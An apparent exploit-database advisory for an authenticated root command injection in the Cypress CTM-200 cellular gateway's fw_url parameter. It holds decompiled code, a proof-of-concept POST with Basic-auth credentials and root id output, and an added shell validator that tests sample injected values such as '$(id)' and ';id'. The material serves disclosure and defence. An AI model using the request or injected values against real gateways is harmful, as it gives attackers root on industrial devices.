Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection

# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage:

Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection

Vendor: Cypress Solutions Inc.
Product web page:
Affected version:

Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.
The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.
Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site
office and SCADA communications.

Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user
through the '' script by leveraging the 'fw_url' POST parameter, which is used as the argument of the
'cmd upgradefw' command, called by ctmsys() as a pointer to execv() and passed by the make_wget_url()
function to the wget command in the /usr/bin/cmdmain ELF binary.


    if ! empty "$FORM_install_fw_url"; then
        echo "</pre>"
        echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
        # The fw_url form field reaches cmd without any validation in between
        cmd upgradefw "$FORM_fw_url"
        unset FORM_install_fw_url FORM_submit
        echo "</pre><br />Done."
    fi

cmdmain (ELF):

    sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
    sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
    iVar3 = ctm_fopen(local_184,"r");
    if (iVar3 == 0) {
      uVar5 = *(undefined4 *)(iParm2 + 8);
      __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
      goto LAB_0001f4a8;
    sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
cmd (ELF):

              while (sVar1 = strlen(__s2), uVar7 < sVar1) {
                __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
                __s2 = *ppcVar8;
                uVar7 = uVar7 + 1;
              uStack180 = 0x7273752f;
              uStack176 = 0x6e69622f;
              uStack172 = 0x646d632f;
              uStack168 = 0x6d632f73;
              uStack164 = 0x69616d64;
              uStack160 = 0x6e;
              uStack159 = 0;
              iVar2 = execv((char *)&uStack180,ppcParm2);
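
A check that could gate the `cmd upgradefw "$FORM_fw_url"` call in the handler shown above, as an added example that is not the vendor's or the advisory author's code. The function names, the `CMD` override, the 256-character limit and the URL shape (http/https/ftp, no query string) are assumptions, and the sample values are constructed.

```shell
#!/bin/sh
# Added example, not vendor code. Assumption: a firmware URL is a plain
# http/https/ftp URL with no query string; host names below are constructed.
LC_ALL=C; export LC_ALL   # keep A-Z style ranges byte-exact

# is_safe_fw_url URL: status 0 if URL passes the allowlist, 1 otherwise.
is_safe_fw_url() {
    url=$1
    # Reject empty or over-long values (256 is an assumed limit).
    [ -n "$url" ] && [ "${#url}" -le 256 ] || return 1
    # Scheme allowlist.
    case $url in
        http://*|https://*|ftp://*) ;;
        *) return 1 ;;
    esac
    # Character allowlist: rejects $ ` ; | & < > ( ) quotes, backslash,
    # whitespace and newlines, i.e. everything a shell would interpret.
    case $url in
        *[!A-Za-z0-9._~:/%-]*) return 1 ;;
    esac
    # Reject an empty or option-like host part and path traversal.
    case ${url#*://} in
        ""|-*|*..*) return 1 ;;
    esac
    return 0
}

# handle_fw_url URL: the handler's call, gated by the check above.
# CMD defaults to the device's "cmd" binary; override it for offline tests.
handle_fw_url() {
    if is_safe_fw_url "$1"; then
        "${CMD:-cmd}" upgradefw "$1"
    else
        echo "firmware URL rejected" >&2
        return 1
    fi
}

# Constructed sample values; single quotes keep them inert in this script.
for u in 'http://fw.example.com/firmware.tar' \
         'http://fw.example.com/a$(id).tar' \
         'http://fw.example.com/a;id' \
         'file:///etc/passwd'; do
    if is_safe_fw_url "$u"; then echo "accept: $u"; else echo "reject: $u"; fi
done
```

This only narrows what the CGI layer forwards; the wget command line built from the argument in cmdmain is where the value is ultimately interpreted.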

Tested on: GNU/Linux (arm4tl)
           BusyBox v1.15.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2021-5687
Advisory URL:



PoC POST request:

POST /cgi-bin/webif/ HTTP/1.1
Connection: keep-alive
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1

Content-Disposition: form-data; name="submit"

Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="fw_url"

Content-Disposition: form-data; name="install_fw_url"

Start Firmware Upgrade from URL
Content-Disposition: form-data; name="pkgurl"



HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http: //">
<html xmlns="http: //" lang="en" xml:lang="en">
Firmware Management

Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image:
extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed

<br />
<fieldset id="save">
    <legend><strong>Proceed Changes</strong></legend>
    <div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
    <ul class="apply">
        <li><a href="" rel="lightbox" >&raquo; Save Configuration &laquo;</a></li>
<hr />
<div id="footer">
    <em>End user extensions for OpenWrt</em>
</div> <!-- End #container -->

